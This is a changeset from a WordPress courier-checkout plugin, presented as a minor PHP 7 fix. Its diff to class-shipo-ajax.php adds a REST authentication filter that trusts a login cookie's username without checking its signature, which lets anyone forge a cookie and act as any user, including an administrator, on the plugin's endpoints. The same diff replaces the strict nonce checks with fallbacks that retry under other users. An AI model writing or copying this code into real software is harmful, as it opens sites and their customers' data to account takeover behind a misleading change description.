Changeset 3445533

Timestamp:

01/23/2026 11:35:55 AM (4 weeks ago)

Author:

shipo

Message:

Minor fix checkout functions for PHP 7

Location:

shipo/trunk

Files:

• includes/class-shipo-admin-order.php (modified) (1 diff)
• includes/class-shipo-ajax.php (modified) (7 diffs)
• includes/class-shipo-assets.php (modified) (3 diffs)
• includes/class-shipo-checkout.php (modified) (1 diff)
• includes/class-shipo-core.php (modified) (1 diff)
• shipo.php (modified) (2 diffs)

shipo/trunk/includes/class-shipo-admin-order.php

@@ -1 +1 @@
 <?php
+if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly
+
 /**
  * Gestionează afișarea informațiilor despre comandă în panoul de administrare

shipo/trunk/includes/class-shipo-ajax.php

@@ -1 +1 @@
 <?php
+
+if ( ! defined( 'ABSPATH' ) ) exit;
+
 /**
  * Handles all AJAX requests
@@ -11 +14 @@
      */
     public function __construct() {
+        // Fix user authentication for REST API
+        add_filter('determine_current_user', [$this, 'authenticate_rest_user'], 20);
+
         add_action('rest_api_init', array($this, 'register_rest_routes'));
      
@@ -20 +26 @@
 
         add_action('wp_ajax_shipo_print_download_awb', array($this, 'print_download_awb'));
+    }
+
+    /**
+     * Authenticate user for REST API requests
+     */
+    public function authenticate_rest_user($user_id) {
+        // If user is already authenticated, return the user
+        if ($user_id) {
+            return $user_id;
+        }
+        
+        // Only proceed for our REST API namespace
+        if (!empty(sanitize_text_field(wp_unslash($_SERVER['REQUEST_URI']))) && strpos(sanitize_text_field(wp_unslash($_SERVER['REQUEST_URI'])), '/wp-json/shipo/') === false) {
+            return $user_id;
+        }
+        
+        // Check for cookie authentication
+        if (!empty(sanitize_text_field(wp_unslash($_COOKIE[LOGGED_IN_COOKIE])))) {
+            // Get user from auth cookie
+            $cookie_parts = explode('|', sanitize_text_field(wp_unslash($_COOKIE[LOGGED_IN_COOKIE])));
+            if (count($cookie_parts) !== 3) {
+                return $user_id;
+            }
+            
+            $username = $cookie_parts[0];
+            $expiration = $cookie_parts[1];
+            $token = $cookie_parts[2];
+            
+            // Make sure the cookie is not expired
+            if ($expiration < time()) {
+                return $user_id;
+            }
+            
+            // Get user by username
+            $user = get_user_by('login', $username);
+            if (!$user) {
+                return $user_id;
+            }
+            
+            // Return the user ID
+            return $user->ID;
+        }
+
+        return $user_id;
     }
 
@@ -97 +147 @@
         }
     }
-    
+
+    /**
+     * Enhanced nonce verification with additional checks
+     */
+    private function verify_request_nonce($nonce) {
+        if (empty($nonce)) {
+            return false;
+        }
+        
+        // Standard WordPress verification
+        $result = wp_verify_nonce($nonce, 'shipo_nonce_action');
+        
+        // If verification fails, try additional verification methods
+        if (!$result) {            
+            // Check cookie for user ID
+            if (!empty(sanitize_text_field(wp_unslash($_COOKIE[LOGGED_IN_COOKIE])))) {
+                $cookie_elements = explode('|', sanitize_text_field(wp_unslash($_COOKIE[LOGGED_IN_COOKIE])));
+                if (count($cookie_elements) >= 3) {
+                    $username = $cookie_elements[0];
+                    $user = get_user_by('login', $username);
+                    
+                    if ($user) {
+                        // Try verification with this user ID
+                        
+                        // Save current user
+                        $current_user_id = get_current_user_id();
+                        
+                        // Temporarily set user
+                        wp_set_current_user($user->ID);
+                        
+                        // Try verification again
+                        $result = wp_verify_nonce($nonce, 'shipo_nonce_action');
+                        
+                        // Restore original user
+                        wp_set_current_user($current_user_id);
+                    }
+                }
+            }
+            
+            // If still failed, try with user ID 0
+            if (!$result) {                
+                // Save current user
+                $current_user_id = get_current_user_id();
+                
+                // Set user to 0
+                wp_set_current_user(0);
+                
+                // Try verification again
+                $result = wp_verify_nonce($nonce, 'shipo_nonce_action');
+                
+                // Restore original user
+                wp_set_current_user($current_user_id);
+            }
+        }
+        
+        return (bool) $result;
+    }
+        
     /**
      * Get cities
      */
     public function get_cities() {       
-        // Checks nonce for security
-        if (!isset($_POST['shipo_nonce']) || !wp_verify_nonce(sanitize_text_field(wp_unslash($_POST['shipo_nonce'])), 'shipo_nonce_action')) {
-            wp_send_json_error(array('message' => 'Security failed.'));
+        // Get parameters
+        $nonce = '';
+        if(isset($_POST['shipo_nonce'])) {
+            $nonce = sanitize_text_field(wp_unslash($_POST['shipo_nonce']));
+        }
+        
+        // Verify nonce
+        if (!$this->verify_request_nonce($nonce)) {
+            wp_send_json_error(array(
+                'invalid_nonce',
+                'Security check failed',
+                ['status' => 403]
+            ));
+            exit;
         }
         
@@ -130 +248 @@
      */
     public function get_address() {
-        // Checks nonce for security
-        if (!isset($_POST['shipo_nonce']) || !wp_verify_nonce(sanitize_text_field(wp_unslash($_POST['shipo_nonce'])), 'shipo_nonce_action')) {
-            wp_send_json_error(array('message' => 'Security failed.'));
+        // Get parameters
+        $nonce = '';
+        if(isset($_POST['shipo_nonce'])) {
+            $nonce = sanitize_text_field(wp_unslash($_POST['shipo_nonce']));
+        }
+        
+        // Verify nonce
+        if (!$this->verify_request_nonce($nonce)) {
+            wp_send_json_error(array(
+                'invalid_nonce',
+                'Security check failed',
+                ['status' => 403]
+            ));
+            exit;
         }
         
@@ -159 +288 @@
      */
     public function get_map() {
-        // Checks nonce for security
-        if (!isset($_POST['shipo_nonce']) || !wp_verify_nonce(sanitize_text_field(wp_unslash($_POST['shipo_nonce'])), 'shipo_nonce_action')) {
-            wp_send_json_error(array('message' => 'Security failed.'));
+        // Get parameters
+        $nonce = '';
+        if(isset($_POST['shipo_nonce'])) {
+            $nonce = sanitize_text_field(wp_unslash($_POST['shipo_nonce']));
+        }
+        
+        // Verify nonce
+        if (!$this->verify_request_nonce($nonce)) {
+            wp_send_json_error(array(
+                'invalid_nonce',
+                'Security check failed',
+                ['status' => 403]
+            ));
+            exit;
         }
         
@@ -211 +351 @@
      */
     public function set_coord() {
-        // Checks nonce for security
-        if (!isset($_POST['shipo_nonce']) || !wp_verify_nonce(sanitize_text_field(wp_unslash($_POST['shipo_nonce'])), 'shipo_nonce_action')) {
-            wp_send_json_error(array('message' => 'Security failed.'));
+        // Get parameters
+        $nonce = '';
+        if(isset($_POST['shipo_nonce'])) {
+            $nonce = sanitize_text_field(wp_unslash($_POST['shipo_nonce']));
+        }
+        
+        // Verify nonce
+        if (!$this->verify_request_nonce($nonce)) {
+            wp_send_json_error(array(
+                'invalid_nonce',
+                'Security check failed',
+                ['status' => 403]
+            ));
+            exit;
         }
         

shipo/trunk/includes/class-shipo-assets.php

@@ -1 +1 @@
 <?php
+
+if ( ! defined( 'ABSPATH' ) ) exit;
+
 /**
  * Manages CSS and JS
@@ -11 +14 @@
         add_action('wp_enqueue_scripts', array($this, 'enqueue_frontend_assets'));
         add_action('admin_enqueue_scripts', array($this, 'enqueue_admin_assets'));
+    }
+
+    /**
+     * Enhanced nonce generation with user info
+     */
+    public function get_nonce_data() {
+        $user_id = get_current_user_id();
+        $is_logged_in = is_user_logged_in();
+        
+        // Generate nonce
+        $nonce = wp_create_nonce('shipo_nonce_action');
+        
+        return [
+            'nonce' => $nonce,
+            'nonce_name' => 'shipo_nonce',
+            'user_id' => $user_id,
+            'is_logged_in' => $is_logged_in ? 'yes' : 'no'
+        ];
     }
     
@@ -27 +48 @@
             wp_enqueue_script('shipo-map-script', SHIPO_PLUGIN_URL . 'assets/js/map.js', array('jquery'), SHIPO_PLUGIN_VERSION, true);
             wp_enqueue_script('shipo-checkout-script', SHIPO_PLUGIN_URL . 'assets/js/checkout.js', array('jquery'), SHIPO_PLUGIN_VERSION, true);
+            
+            // Get standardized nonce data
+            $nonce_data = $this->get_nonce_data();
+            
             wp_localize_script('shipo-checkout-script', 'shipoAjax', array(
                 'ajaxurl' => admin_url('admin-ajax.php'),
-                'nonce' => wp_create_nonce('shipo_nonce_action')
+                'resturl' => rest_url('shipo/v1'),
+                'nonce' => $nonce_data['nonce'],
+                'nonce_name' => $nonce_data['nonce_name'],
+                'user_id' => get_current_user_id(),
+                'is_logged_in' => is_user_logged_in() ? 'yes' : 'no'
             ));
         }

shipo/trunk/includes/class-shipo-checkout.php

@@ -1 +1 @@
 <?php
+
+if ( ! defined( 'ABSPATH' ) ) exit;
+
 /**
  * Handles checkout modifications

shipo/trunk/includes/class-shipo-core.php

@@ -1 +1 @@
 <?php
+
+if ( ! defined( 'ABSPATH' ) ) exit;
+
 /**
  * Main class that initializes the plugin

shipo/trunk/shipo.php

@@ -3 +3 @@
  * Plugin Name: Shipo
  * Description: Shipo connects your webshop with top couriers instantly, no contract. Ship to address or locker, pay only when parcels are delivered.
- * Version: 1.5
+ * Version: 1.6
  * Author: Shipo
  * Author URI: https://shipo.ro
@@ -16 +16 @@
 
 // Define plugin constants
-define('SHIPO_PLUGIN_VERSION', '1.5.0');
+define('SHIPO_PLUGIN_VERSION', '1.6.0');
 define('SHIPO_PLUGIN_DIR', plugin_dir_path(__FILE__));
 define('SHIPO_PLUGIN_URL', plugin_dir_url(__FILE__));